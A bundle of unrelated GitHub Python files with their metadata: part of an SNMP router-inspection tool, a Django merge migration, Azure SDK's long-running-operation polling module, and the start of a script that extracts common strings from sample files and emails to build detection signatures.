if str(onbr[1]) in Network(self.snmpDevice[self.host]['interfaces'][intf[1]]['ipAdEntAddr'] + "/" + self.snmpDevice[self.host]['interfaces'][intf[1]]['ipAdEntNetMask']):
self.snmpDevice[self.host]['interfaces'][intf[1]]['OSPF-MIB']['adj'][i]['ospfNbrRtrId'] = str(onbr[0])
self.snmpDevice[self.host]['interfaces'][intf[1]]['OSPF-MIB']['adj'][i]['ospfNbrIpAddr'] = str(onbr[1])
self.snmpDevice[self.host]['interfaces'][intf[1]]['OSPF-MIB']['adj'][i]['ospfNbrPriority'] = str(onbr[2]).replace('.','')
self.snmpDevice[self.host]['interfaces'][intf[1]]['OSPF-MIB']['adj'][i]['ospfNbrState'] = str(onbr[3])[:-3]
self.snmpDevice[self.host]['interfaces'][intf[1]]['OSPF-MIB']['adj'][i]['ospfNbrOptions'] = str(onbr[4])
############## MPLS LDP Neighbors
for i,ldp in enumerate(self.ldps):
if intf[1] == ldp[3] :
self.snmpDevice[self.host]['interfaces'][intf[1]]['mplsLdpStdMIB']['adj'][i]['ospfNbrRtrId'] = str(ldp[2])
############## CDP Neighbors filterd per interface
for cdpEn in self.cdpEns:
if intf[1] == cdpEn[0]:
self.snmpDevice[self.host]['interfaces'][intf[1]]['CISCO-CDP-MIB']['cdpInterfaceEnable'] = str(cdpEn[1])[:-3]
if str(cdpEn[1])[-2] == "1":
for i,cdpEntry in enumerate(self.cdpEntrys):
self.snmpDevice[self.host]['interfaces'][intf[1]]['CISCO-CDP-MIB'][i]['cdpCacheDeviceId'] = str(cdpEntry[0])
self.snmpDevice[self.host]['interfaces'][intf[1]]['CISCO-CDP-MIB'][i]['cdpCacheDevicePort'] = str(cdpEntry[4])
slef.snmpDevice[self.host]['interfaces'][intf[1]]['CISCO-CDP-MIB'][i]['cdpCacheAddress'] = convertIP(cdpEntry[5])
self.snmpDevice[self.host]['interfaces'][intf[1]]['CISCO-CDP-MIB'][i]['cdpCachePlatform'] = str(cdpEntry[6])
def __str__(self):
return json.dumps(self.snmpDevice, sort_keys=True, indent=4, separators=(',', ': '))
def show_interfaces(self):
### build table with interfaces
table = Texttable()
table.set_cols_align(["c", "l", "l", "l", "l", "l"])
data = [["ifIndex","ifDescr","ifAlias","IPadd","AS","OS"]]
for line,interface in enumerate(self.snmpDevice[self.host]['interfaces']):
### check if the interface has an ip address
if self.snmpDevice[self.host]['interfaces'][interface]['ipAdEntAddr']:
data.append([str(self.snmpDevice[self.host]['interfaces'][interface]['ifIndex']), \
minimize(str(self.snmpDevice[self.host]['interfaces'][interface]['ifDescr'])), \
str(self.snmpDevice[self.host]['interfaces'][interface]['ifAlias']), \
str(self.snmpDevice[self.host]['interfaces'][interface]['ipAdEntAddr']), \
str(self.snmpDevice[self.host]['interfaces'][interface]['ifAdminStatus']), \
str(self.snmpDevice[self.host]['interfaces'][interface]['ifOperStatus']), \
])
else:
data.append([str(self.snmpDevice[self.host]['interfaces'][interface]['ifIndex']), \
minimize(str(self.snmpDevice[self.host]['interfaces'][interface]['ifDescr'])), \
str(self.snmpDevice[self.host]['interfaces'][interface]['ifAlias']), \
"--", \
str(self.snmpDevice[self.host]['interfaces'][interface]['ifAdminStatus']), \
str(self.snmpDevice[self.host]['interfaces'][interface]['ifOperStatus']), \
])
table.add_rows(data, header=True)
return table.draw()
def ifStatEngine(self,choice,speedUnit="kb",secDelta=5):
### delta time bw two probes
sec = secDelta
### first probe
m = M(host=self.snmpTarget,community=self.snmpCommunity,none=True)
intfsOne = []
for val in m.ifIndex.keys():
if str(val) == str(choice):
intfsOne.append(int(val))
intfsOne.append(str(m.ifDescr[val]))
intfsOne.append(int(m.ifHCOutOctets[val]))
intfsOne.append(int(m.ifHCInOctets[val]))
intfsOne.append(int(m.ifHighSpeed[val]))
intfsOne.append(str(m.ifAlias[val]))
# print intfsOne
time.sleep(sec)
### first probe
m = M(host=self.snmpTarget,community=self.snmpCommunity,none=True)
intfsTwo = []
for val in m.ifIndex.keys():
if str(val) == str(choice):
intfsTwo.append(int(val))
intfsTwo.append(str(m.ifDescr[val]))
intfsTwo.append(int(m.ifHCOutOctets[val]))
intfsTwo.append(int(m.ifHCInOctets[val]))
intfsTwo.append(int(m.ifHighSpeed[val]))
intfsTwo.append(str(m.ifAlias[val]))
# print intfsTwo
# if interface has no HC speed attribute (like Loopback, null, ecc), set default interface speed
if intfsOne[4] == 0:
speed = 1000
else:
speed = intfsOne[4]
# calc speed based speedUnit set
if "kb" in speedUnit:
inSpeed = (((intfsTwo[2]-intfsOne[2]) * 8 * 100) / (sec * speed)) / 1024
outSpeed = (((intfsTwo[3]-intfsOne[3]) * 8 * 100) / (sec * speed)) / 1024
# return Out, In speed
return float(outSpeed), float(inSpeed)
def show_interfaces_speed(self, choice):
tree = lambda: collections.defaultdict(tree)
choice_explode = tree()
### build table with interfaces and current SPEED/sec
while True:
table = Texttable()
table.set_deco(Texttable.HEADER)
table.set_cols_align(["c", "l", "l", "l", "l"])
data = [["ifIndex","ifDescr","ifAlias","Out","In"]]
for i in range(len(choice)):
choice_explode[choice[i]]['Out'], choice_explode[choice[i]]['In'] = self.ifStatEngine(int(choice[i]),"kb",1)
os.system('clear')
for line,interface in enumerate(self.snmpDevice[self.host]['interfaces']):
for i,ch in enumerate(choice):
if str(self.snmpDevice[self.host]['interfaces'][interface]['ifIndex']) == str(ch):
data.append([str(self.snmpDevice[self.host]['interfaces'][interface]['ifIndex']), \
minimize(str(self.snmpDevice[self.host]['interfaces'][interface]['ifDescr'])), \
str(self.snmpDevice[self.host]['interfaces'][interface]['ifAlias']), \
str(choice_explode[ch]['Out']), \
str(choice_explode[ch]['In']), \
])
### still print other interfaces, # if you don't want print out informations
break
if ch not in str(self.snmpDevice[self.host]['interfaces'][interface]['ifIndex']):
data.append([str(self.snmpDevice[self.host]['interfaces'][interface]['ifIndex']), \
minimize(str(self.snmpDevice[self.host]['interfaces'][interface]['ifDescr'])), \
str(self.snmpDevice[self.host]['interfaces'][interface]['ifAlias']), \
"---", \
"---", \
])
table.add_rows(data, header=True)
print table.draw()
exit()
def ifstat(self,string="None"):
############## ifStat
if "None" in string: ### -i
print self.show_interfaces()
print ""
choice = raw_input("choose interface: ")
### 5,7
if "," in choice:
os.system('clear')
self.show_interfaces_speed(choice.split(","))
elif re.search('[\d+\,]+', string): ### -i 5[,7]
choice = string
if "," in choice:
os.system('clear')
self.show_interfaces_speed(choice.split(","))
elif re.search('\d+', string): ### -i 6
choice = string
elif re.search('[a-zA-Z]*', string): ### -i GPRX
m = M(host=self.snmpTarget,community=self.snmpCommunity,none=True)
choice = None
for val in m.ifIndex.keys():
if str(m.ifAlias[val]) == string:
choice = val
print ""
for i in self.snmpDevice[self.host]['interfaces']:
if int(choice) == self.snmpDevice[self.host]['interfaces'][i]['ifIndex']:
print self.snmpDevice[self.host]['interfaces'][i]['ifIndex'], " - ",self.snmpDevice[self.host]['interfaces'][i]['ifDescr']
print "\'" + str(self.snmpDevice[self.host]['interfaces'][i]['ifAlias']) + "\'"
print "\nOut\tIn"
while True:
OutSpeed, inSpeed = self.ifStatEngine(choice,"kb",1)
print OutSpeed, "\t", inSpeed
def summary(self):
print "hostname", self.snmpDevice[self.host]['global']['sysName']
print "OSPF RID", self.snmpDevice[self.host]['OSPF-MIB']['ospfRouterId']
print "BGP RID", self.snmpDevice[self.host]['BGP4-MIB']['bgpIdentifier']
print "Interface no.", len(self.snmpDevice[self.host]['interfaces'])
print "OSPF Adjacency", len(self.onbrs)
print "LDP Adjacency", len(self.ldps)
def walkInterfaces(self):
### cicle on interfaces
for int in self.snmpDevice[self.host]['interfaces']:
print "*",self.snmpDevice[self.host]['interfaces'][int]['ifDescr']
# if interface own an ip address
if self.snmpDevice[self.host]['interfaces'][int]["ipAdEntAddr"]:
# if interface belong into vrf
if self.snmpDevice[self.host]['interfaces'][int]["MPLS-L3VPN-STD-MIB"]:
# if interface has an ip arp neighbors
if len(self.snmpDevice[self.host]['interfaces'][int]['ipNetToMediaNetAddress']) is not 0:
# show ip arp neighbors belong on this interface
for arp in self.snmpDevice[self.host]['interfaces'][int]['ipNetToMediaNetAddress']:
# print vrf XXX arp neighbor
print " pint vrf", self.snmpDevice[self.host]['interfaces'][int]["MPLS-L3VPN-STD-MIB"]['mplsL3VpnVrfName'], \
self.snmpDevice[self.host]['interfaces'][int]['ipNetToMediaNetAddress'][arp]
print " telnet", self.snmpDevice[self.host]['interfaces'][int]['ipNetToMediaNetAddress'][arp], \
"/vrf ",self.snmpDevice[self.host]['interfaces'][int]["MPLS-L3VPN-STD-MIB"]['mplsL3VpnVrfName']
# if interface do not belong into vrf
else:
# if interface has an ip arp neighbors
if len(self.snmpDevice[self.host]['interfaces'][int]['ipNetToMediaNetAddress']) is not 0:
# show ip arp neighbors belong on this interface
for arp in self.snmpDevice[self.host]['interfaces'][int]['ipNetToMediaNetAddress']:
# print arp neighbor
print " ping", self.snmpDevice[self.host]['interfaces'][int]['ipNetToMediaNetAddress'][arp]
print " telnet ", self.snmpDevice[self.host]['interfaces'][int]['ipNetToMediaNetAddress'][arp]
| {
"content_hash": "38b797b27a09a81f3bf012778829d5dc",
"timestamp": "",
"source": "github",
"line_count": 552,
"max_line_length": 175,
"avg_line_length": 35.41123188405797,
"alnum_prop": 0.6369775413106871,
"repo_name": "mft3000/snmpEngine",
"id": "5d24ee6782f0df5f0cf0f40deeee7b119bf96b54",
"size": "20076",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "snmpEngine/snmpEngine.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "22381"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('tablemanager', '0011_auto_20151021_1354'),
('tablemanager', '0011_auto_20151020_0912'),
]
operations = [
]
| {
"content_hash": "6e43f78e5aa627b819627a809b8d234b",
"timestamp": "",
"source": "github",
"line_count": 14,
"max_line_length": 52,
"avg_line_length": 20.214285714285715,
"alnum_prop": 0.6501766784452296,
"repo_name": "rockychen-dpaw/borgcollector",
"id": "a61196678c9d87f00ab37295e10d7e5584d95d23",
"size": "307",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tablemanager/migrations/0012_merge.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "9821"
},
{
"name": "JavaScript",
"bytes": "55"
},
{
"name": "Python",
"bytes": "720469"
},
{
"name": "TSQL",
"bytes": "9939"
}
],
"symlink_target": ""
} |
import abc
import base64
import json
from enum import Enum
from typing import TYPE_CHECKING, Optional, Any, Union
from ..exceptions import HttpResponseError, DecodeError
from . import PollingMethod
from ..pipeline.policies._utils import get_retry_after
from ..pipeline._tools import is_rest
from .._enum_meta import CaseInsensitiveEnumMeta
if TYPE_CHECKING:
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import (
HttpResponse,
AsyncHttpResponse,
HttpRequest,
)
ResponseType = Union[HttpResponse, AsyncHttpResponse]
PipelineResponseType = PipelineResponse[HttpRequest, ResponseType]
ABC = abc.ABC
_FINISHED = frozenset(["succeeded", "canceled", "failed"])
_FAILED = frozenset(["canceled", "failed"])
_SUCCEEDED = frozenset(["succeeded"])
def _finished(status):
if hasattr(status, "value"):
status = status.value
return str(status).lower() in _FINISHED
def _failed(status):
if hasattr(status, "value"):
status = status.value
return str(status).lower() in _FAILED
def _succeeded(status):
if hasattr(status, "value"):
status = status.value
return str(status).lower() in _SUCCEEDED
class BadStatus(Exception):
pass
class BadResponse(Exception):
pass
class OperationFailed(Exception):
pass
def _as_json(response):
# type: (ResponseType) -> dict
"""Assuming this is not empty, return the content as JSON.
Result/exceptions is not determined if you call this method without testing _is_empty.
:raises: DecodeError if response body contains invalid json data.
"""
try:
return json.loads(response.text())
except ValueError:
raise DecodeError("Error occurred in deserializing the response body.")
def _raise_if_bad_http_status_and_method(response):
# type: (ResponseType) -> None
"""Check response status code is valid.
Must be 200, 201, 202, or 204.
:raises: BadStatus if invalid status.
"""
code = response.status_code
if code in {200, 201, 202, 204}:
return
raise BadStatus(
"Invalid return status {!r} for {!r} operation".format(
code, response.request.method
)
)
def _is_empty(response):
# type: (ResponseType) -> bool
"""Check if response body contains meaningful content.
:rtype: bool
"""
return not bool(response.body())
class LongRunningOperation(ABC):
"""LongRunningOperation
Provides default logic for interpreting operation responses
and status updates.
:param azure.core.pipeline.PipelineResponse response: The initial pipeline response.
:param callable deserialization_callback: The deserialization callaback.
:param dict lro_options: LRO options.
:param kwargs: Unused for now
"""
@abc.abstractmethod
def can_poll(self, pipeline_response):
# type: (PipelineResponseType) -> bool
"""Answer if this polling method could be used.
"""
raise NotImplementedError()
@abc.abstractmethod
def get_polling_url(self):
# type: () -> str
"""Return the polling URL.
"""
raise NotImplementedError()
@abc.abstractmethod
def set_initial_status(self, pipeline_response):
# type: (PipelineResponseType) -> str
"""Process first response after initiating long running operation.
:param azure.core.pipeline.PipelineResponse response: initial REST call response.
"""
raise NotImplementedError()
@abc.abstractmethod
def get_status(self, pipeline_response):
# type: (PipelineResponseType) -> str
"""Return the status string extracted from this response."""
raise NotImplementedError()
@abc.abstractmethod
def get_final_get_url(self, pipeline_response):
# type: (PipelineResponseType) -> Optional[str]
"""If a final GET is needed, returns the URL.
:rtype: str
"""
raise NotImplementedError()
class _LroOption(str, Enum, metaclass=CaseInsensitiveEnumMeta):
"""Known LRO options from Swagger."""
FINAL_STATE_VIA = "final-state-via"
class _FinalStateViaOption(str, Enum, metaclass=CaseInsensitiveEnumMeta):
"""Possible final-state-via options."""
AZURE_ASYNC_OPERATION_FINAL_STATE = "azure-async-operation"
LOCATION_FINAL_STATE = "location"
OPERATION_LOCATION_FINAL_STATE = "operation-location"
class OperationResourcePolling(LongRunningOperation):
"""Implements a operation resource polling, typically from Operation-Location.
:param str operation_location_header: Name of the header to return operation format (default 'operation-location')
:keyword dict[str, any] lro_options: Additional options for LRO. For more information, see
https://aka.ms/azsdk/autorest/openapi/lro-options
"""
def __init__(
self, operation_location_header="operation-location", *, lro_options=None
):
self._operation_location_header = operation_location_header
# Store the initial URLs
self._async_url = None
self._location_url = None
self._request = None
self._lro_options = lro_options or {}
def can_poll(self, pipeline_response):
"""Answer if this polling method could be used.
"""
response = pipeline_response.http_response
return self._operation_location_header in response.headers
def get_polling_url(self):
# type: () -> str
"""Return the polling URL.
"""
return self._async_url
def get_final_get_url(self, pipeline_response):
# type: (PipelineResponseType) -> Optional[str]
"""If a final GET is needed, returns the URL.
:rtype: str
"""
if (
self._lro_options.get(_LroOption.FINAL_STATE_VIA) == _FinalStateViaOption.LOCATION_FINAL_STATE
and self._location_url
):
return self._location_url
if (
self._lro_options.get(_LroOption.FINAL_STATE_VIA)
in [
_FinalStateViaOption.AZURE_ASYNC_OPERATION_FINAL_STATE,
_FinalStateViaOption.OPERATION_LOCATION_FINAL_STATE
]
and self._request.method == "POST"
):
return None
response = pipeline_response.http_response
if not _is_empty(response):
body = _as_json(response)
# https://github.com/microsoft/api-guidelines/blob/vNext/Guidelines.md#target-resource-location
resource_location = body.get("resourceLocation")
if resource_location:
return resource_location
if self._request.method in {"PUT", "PATCH"}:
return self._request.url
if self._request.method == "POST" and self._location_url:
return self._location_url
return None
def set_initial_status(self, pipeline_response):
# type: (PipelineResponseType) -> str
"""Process first response after initiating long running operation.
:param azure.core.pipeline.PipelineResponse response: initial REST call response.
"""
self._request = pipeline_response.http_response.request
response = pipeline_response.http_response
self._set_async_url_if_present(response)
if response.status_code in {200, 201, 202, 204} and self._async_url:
return "InProgress"
raise OperationFailed("Operation failed or canceled")
def _set_async_url_if_present(self, response):
# type: (ResponseType) -> None
self._async_url = response.headers[self._operation_location_header]
location_url = response.headers.get("location")
if location_url:
self._location_url = location_url
def get_status(self, pipeline_response):
# type: (PipelineResponseType) -> str
"""Process the latest status update retrieved from an "Operation-Location" header.
:param azure.core.pipeline.PipelineResponse response: The response to extract the status.
:raises: BadResponse if response has no body, or body does not contain status.
"""
response = pipeline_response.http_response
if _is_empty(response):
raise BadResponse(
"The response from long running operation does not contain a body."
)
body = _as_json(response)
status = body.get("status")
if not status:
raise BadResponse("No status found in body")
return status
class LocationPolling(LongRunningOperation):
"""Implements a Location polling.
"""
def __init__(self):
self._location_url = None
def can_poll(self, pipeline_response):
# type: (PipelineResponseType) -> bool
"""Answer if this polling method could be used.
"""
response = pipeline_response.http_response
return "location" in response.headers
def get_polling_url(self):
# type: () -> str
"""Return the polling URL.
"""
return self._location_url
def get_final_get_url(self, pipeline_response):
# type: (PipelineResponseType) -> Optional[str]
"""If a final GET is needed, returns the URL.
:rtype: str
"""
return None
def set_initial_status(self, pipeline_response):
# type: (PipelineResponseType) -> str
"""Process first response after initiating long running operation.
:param azure.core.pipeline.PipelineResponse response: initial REST call response.
"""
response = pipeline_response.http_response
self._location_url = response.headers["location"]
if response.status_code in {200, 201, 202, 204} and self._location_url:
return "InProgress"
raise OperationFailed("Operation failed or canceled")
def get_status(self, pipeline_response):
# type: (PipelineResponseType) -> str
"""Process the latest status update retrieved from a 'location' header.
:param azure.core.pipeline.PipelineResponse response: latest REST call response.
:raises: BadResponse if response has no body and not status 202.
"""
response = pipeline_response.http_response
if "location" in response.headers:
self._location_url = response.headers["location"]
return "InProgress" if response.status_code == 202 else "Succeeded"
class StatusCheckPolling(LongRunningOperation):
"""Should be the fallback polling, that don't poll but exit successfully
if not other polling are detected and status code is 2xx.
"""
def can_poll(self, pipeline_response):
# type: (PipelineResponseType) -> bool
"""Answer if this polling method could be used.
"""
return True
def get_polling_url(self):
# type: () -> str
"""Return the polling URL.
"""
raise ValueError("This polling doesn't support polling")
def set_initial_status(self, pipeline_response):
# type: (PipelineResponseType) -> str
"""Process first response after initiating long running
operation and set self.status attribute.
:param azure.core.pipeline.PipelineResponse response: initial REST call response.
"""
return "Succeeded"
def get_status(self, pipeline_response):
# type: (PipelineResponseType) -> str
return "Succeeded"
def get_final_get_url(self, pipeline_response):
# type: (PipelineResponseType) -> Optional[str]
"""If a final GET is needed, returns the URL.
:rtype: str
"""
return None
class LROBasePolling(PollingMethod): # pylint: disable=too-many-instance-attributes
"""A base LRO poller.
This assumes a basic flow:
- I analyze the response to decide the polling approach
- I poll
- I ask the final resource depending of the polling approach
If your polling need are more specific, you could implement a PollingMethod directly
"""
def __init__(
self,
timeout=30,
lro_algorithms=None,
lro_options=None,
path_format_arguments=None,
**operation_config
):
self._lro_algorithms = lro_algorithms or [
OperationResourcePolling(lro_options=lro_options),
LocationPolling(),
StatusCheckPolling(),
]
self._timeout = timeout
self._client = None # Will hold the Pipelineclient
self._operation = None # Will hold an instance of LongRunningOperation
self._initial_response = None # Will hold the initial response
self._pipeline_response = None # Will hold latest received response
self._deserialization_callback = None # Will hold the deserialization callback
self._operation_config = operation_config
self._lro_options = lro_options
self._path_format_arguments = path_format_arguments
self._status = None
def status(self):
"""Return the current status as a string.
:rtype: str
"""
if not self._operation:
raise ValueError(
"set_initial_status was never called. Did you give this instance to a poller?"
)
return self._status
def finished(self):
"""Is this polling finished?
:rtype: bool
"""
return _finished(self.status())
def resource(self):
"""Return the built resource.
"""
return self._parse_resource(self._pipeline_response)
@property
def _transport(self):
return self._client._pipeline._transport # pylint: disable=protected-access
def initialize(self, client, initial_response, deserialization_callback):
"""Set the initial status of this LRO.
:param initial_response: The initial response of the poller
:raises: HttpResponseError if initial status is incorrect LRO state
"""
self._client = client
self._pipeline_response = self._initial_response = initial_response
self._deserialization_callback = deserialization_callback
for operation in self._lro_algorithms:
if operation.can_poll(initial_response):
self._operation = operation
break
else:
raise BadResponse("Unable to find status link for polling.")
try:
_raise_if_bad_http_status_and_method(self._initial_response.http_response)
self._status = self._operation.set_initial_status(initial_response)
except BadStatus as err:
self._status = "Failed"
raise HttpResponseError(response=initial_response.http_response, error=err)
except BadResponse as err:
self._status = "Failed"
raise HttpResponseError(
response=initial_response.http_response, message=str(err), error=err
)
except OperationFailed as err:
raise HttpResponseError(response=initial_response.http_response, error=err)
def get_continuation_token(self):
# type() -> str
import pickle
return base64.b64encode(pickle.dumps(self._initial_response)).decode('ascii')
@classmethod
def from_continuation_token(cls, continuation_token, **kwargs):
# type(str, Any) -> Tuple
try:
client = kwargs["client"]
except KeyError:
raise ValueError("Need kwarg 'client' to be recreated from continuation_token")
try:
deserialization_callback = kwargs["deserialization_callback"]
except KeyError:
raise ValueError("Need kwarg 'deserialization_callback' to be recreated from continuation_token")
import pickle
initial_response = pickle.loads(base64.b64decode(continuation_token)) # nosec
# Restore the transport in the context
initial_response.context.transport = client._pipeline._transport # pylint: disable=protected-access
return client, initial_response, deserialization_callback
def run(self):
try:
self._poll()
except BadStatus as err:
self._status = "Failed"
raise HttpResponseError(
response=self._pipeline_response.http_response,
error=err
)
except BadResponse as err:
self._status = "Failed"
raise HttpResponseError(
response=self._pipeline_response.http_response,
message=str(err),
error=err
)
except OperationFailed as err:
raise HttpResponseError(
response=self._pipeline_response.http_response,
error=err
)
def _poll(self):
"""Poll status of operation so long as operation is incomplete and
we have an endpoint to query.
:param callable update_cmd: The function to call to retrieve the
latest status of the long running operation.
:raises: OperationFailed if operation status 'Failed' or 'Canceled'.
:raises: BadStatus if response status invalid.
:raises: BadResponse if response invalid.
"""
if not self.finished():
self.update_status()
while not self.finished():
self._delay()
self.update_status()
if _failed(self.status()):
raise OperationFailed("Operation failed or canceled")
final_get_url = self._operation.get_final_get_url(self._pipeline_response)
if final_get_url:
self._pipeline_response = self.request_status(final_get_url)
_raise_if_bad_http_status_and_method(self._pipeline_response.http_response)
def _parse_resource(self, pipeline_response):
# type: (PipelineResponseType) -> Optional[Any]
"""Assuming this response is a resource, use the deserialization callback to parse it.
If body is empty, assuming no resource to return.
"""
response = pipeline_response.http_response
if not _is_empty(response):
return self._deserialization_callback(pipeline_response)
return None
def _sleep(self, delay):
self._transport.sleep(delay)
def _extract_delay(self):
if self._pipeline_response is None:
return None
delay = get_retry_after(self._pipeline_response)
if delay:
return delay
return self._timeout
def _delay(self):
"""Check for a 'retry-after' header to set timeout,
otherwise use configured timeout.
"""
delay = self._extract_delay()
self._sleep(delay)
def update_status(self):
"""Update the current status of the LRO.
"""
self._pipeline_response = self.request_status(self._operation.get_polling_url())
_raise_if_bad_http_status_and_method(self._pipeline_response.http_response)
self._status = self._operation.get_status(self._pipeline_response)
def _get_request_id(self):
return self._pipeline_response.http_response.request.headers[
"x-ms-client-request-id"
]
def request_status(self, status_link):
"""Do a simple GET to this status link.
This method re-inject 'x-ms-client-request-id'.
:rtype: azure.core.pipeline.PipelineResponse
"""
if self._path_format_arguments:
status_link = self._client.format_url(status_link, **self._path_format_arguments)
# Re-inject 'x-ms-client-request-id' while polling
if "request_id" not in self._operation_config:
self._operation_config["request_id"] = self._get_request_id()
if is_rest(self._initial_response.http_response):
# if I am a azure.core.rest.HttpResponse
# want to keep making azure.core.rest calls
from azure.core.rest import HttpRequest as RestHttpRequest
request = RestHttpRequest("GET", status_link)
return self._client.send_request(
request, _return_pipeline_response=True, **self._operation_config
)
# if I am a azure.core.pipeline.transport.HttpResponse
request = self._client.get(status_link)
return self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **self._operation_config
)
__all__ = [
'BadResponse',
'BadStatus',
'OperationFailed',
'LongRunningOperation',
'OperationResourcePolling',
'LocationPolling',
'StatusCheckPolling',
'LROBasePolling',
]
| {
"content_hash": "5a9d09aaac06881e6f4954cdcd83f111",
"timestamp": "",
"source": "github",
"line_count": 612,
"max_line_length": 118,
"avg_line_length": 33.82516339869281,
"alnum_prop": 0.6354282401816337,
"repo_name": "Azure/azure-sdk-for-python",
"id": "7a97ab514a8bfc77f4e1304a1c610a31abf587c6",
"size": "22004",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "sdk/core/azure-core/azure/core/polling/base_polling.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1224"
},
{
"name": "Bicep",
"bytes": "24196"
},
{
"name": "CSS",
"bytes": "6089"
},
{
"name": "Dockerfile",
"bytes": "4892"
},
{
"name": "HTML",
"bytes": "12058"
},
{
"name": "JavaScript",
"bytes": "8137"
},
{
"name": "Jinja",
"bytes": "10377"
},
{
"name": "Jupyter Notebook",
"bytes": "272022"
},
{
"name": "PowerShell",
"bytes": "518535"
},
{
"name": "Python",
"bytes": "715484989"
},
{
"name": "Shell",
"bytes": "3631"
}
],
"symlink_target": ""
} |
import re, sys, os, argparse, hashlib, random, email
from datetime import datetime
#Ensure Import path is in syspath
pathname = os.path.abspath(os.path.dirname(sys.argv[0]))
sys.path.append(pathname + '/modules')
#Make sure requred imports are present
try:
import pefile
except:
print "[!] PEfile not installed or present in ./modules directory"
sys.exit(1)
def getFiles(workingdir):
global hashList
fileDict = {}
hashList = []
#get hashes
for f in os.listdir(workingdir):
if os.path.isfile(workingdir + f) and not f.startswith("."):
fhash = md5sum(workingdir + f)
fileDict[fhash] = workingdir + f
hashList.append(fhash)
if len(fileDict) == 0:
print "[!] No Files Present in \"" + workingdir +"\""
sys.exit(1)
else:
return fileDict
#Use PEfile for executables and remove import/api calls from sigs
def exeImportsFuncs(filename, allstrings):
try:
pe = pefile.PE(filename)
importlist = []
for entry in pe.DIRECTORY_ENTRY_IMPORT:
importlist.append(entry.dll)
for imp in entry.imports:
importlist.append(imp.name)
for imp in importlist:
if imp in allstrings: allstrings.remove(imp)
if len(allstrings) > 0:
return list(set(allstrings))
else:
print '[!] No Extractable Attributes Present in Hash: '+str(md5sum(filename)) + ' Please Remove it from the Sample Set and Try Again!'
sys.exit(1)
except:
return allstrings
#EML File parsing, and comparision based on dictionary entries .... plus regexes looking for domains/links in text/html
def emailParse(filename):
try:
def emailStrings(text):
#same as normal string extract except for " " so each word will be isolated, and nuking <>,. to excude HTML tags and punctuation
chars = r"A-Za-z0-9/\-:_$%@'()\\\{\};\]\["
regexp = '[%s]{%d,100}' % (chars, 6)
pattern = re.compile(regexp)
strlist = pattern.findall(text)
return strlist
uselesskeys = ['DKIM-Signature', 'X-SENDER-REPUTATION', 'References', 'To', 'Delivered-To', 'Received','Message-ID', 'MIME-Version','In-Reply-To', 'Date', 'Content-Type', 'X-Original-To']
emailfile = open(filename, 'r')
msg = email.message_from_file(emailfile)
emaildict = dict(msg.items())
if len(emaildict) == 0:
print '[!] This File is not an EML File: '+str(md5sum(filename)) + ' Please Remove it from the Sample Set or Select Proper FileType!'
sys.exit(1)
for uselesskey in uselesskeys:
if uselesskey in emaildict:
del emaildict[uselesskey]
emaillist = []
for part in msg.walk():
part_ct = str(part.get_content_type())
if "plain" in part_ct:
bodyplain = part.get_payload(decode=True)
# emaildict['Body-Plaintxt'] = list(set(emailStrings(bodyplain)))
textlinks = linkSearch(bodyplain)
if textlinks:
emaildict['Body-Links'] = textlinks
if "html" in part_ct:
bodyhtml = part.get_payload(decode=True)
# emaildict['Body-HTML'] = list(set(emailStrings(bodyhtml)))
htmllinks = linkSearch(bodyhtml)
if htmllinks:
emaildict['Body-Links'] = htmllinks
if "application" in part_ct:
if part.get_filename():
emaildict['attachmentName'] = part.get_filename()
for key, value in emaildict.iteritems():
if isinstance(value, list):
for subval in value:
emaillist.append(subval)
else:
emaillist.append(value)
return emaillist
except Exception:
print '[!] This File is not an EML File: '+str(md5sum(filename)) + ' Please Remove it from the Sample Set or Select Proper FileType!'
sys.exit(1)
def linkSearch(attachment):
urls = list(set(re.compile('(?:ftp|hxxp)[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', re.I).findall(attachment)))
return urls
#Simple String / ASCII Wide and URL string extraction
def getStrings(filename):
try:
data = open(filename,'rb').read()
chars = r"A-Za-z0-9/\-:.,_$%@'()\\\{\};\]\[<> "
regexp = '[%s]{%d,100}' % (chars, 6)
pattern = re.compile(regexp)
strlist = pattern.findall(data)
#Get Wide Strings
unicode_str = re.compile( ur'(?:[\x20-\x7E][\x00]){6,100}',re.UNICODE )
unicodelist = unicode_str.findall(data)
allstrings = unicodelist + strlist
#Extract URLs if present
exeurls = linkSearch(data)
if exeurls:
for url in exeurls:
allstrings.append(url)
# use pefile to extract names of imports and function calls and remove them from string list
if len(allstrings) > 0:
return list(set(allstrings))
else:
print '[!] No Extractable Attributes Present in Hash: '+str(md5sum(filename)) + ' Please Remove it from the Sample Set and Try Again!'
sys.exit(1)
except Exception:
print '[!] No Extractable Attributes Present in Hash: '+str(md5sum(filename)) + ' Please Remove it from the Sample Set and Try Again!'
sys.exit(1)
def md5sum(filename):
fh = open(filename, 'rb')
m = hashlib.md5()
while True:
data = fh.read(8192)
if not data:
break
m.update(data)
return m.hexdigest()
#find common strings and check against filetype specific blacklists
def findCommonStrings(fileDict, filetype):
baseStringList = random.choice(fileDict.values())
finalStringList = []
matchNumber = len(fileDict)
for s in baseStringList:
sNum = 0
for key, value in fileDict.iteritems():
if s in value:
sNum +=1
if sNum == matchNumber:
finalStringList.append(s)
#import and use filetype specific blacklist/regexlist to exclude unwanted sig material
#Various utility functions to extract strings/data/info and isolate signature material
with open(pathname +'/modules/'+filetype+'_blacklist.txt') as f:
blacklist = f.read().splitlines()
with open(pathname +'/modules/'+filetype+'_regexblacklist.txt') as f:
regblacklist = f.read().splitlines()
#Match Against Blacklist
for black in blacklist:
if black in finalStringList: finalStringList.remove(black)
#Match Against Regex Blacklist
regmatchlist = []
for regblack in regblacklist:
for string in finalStringList:
regex = re.compile(regblack)
if regex.search(string): regmatchlist.append(string)
if len(regmatchlist) > 0:
for match in list(set(regmatchlist)):
finalStringList.remove(match)
return finalStringList
#Build the actual rule
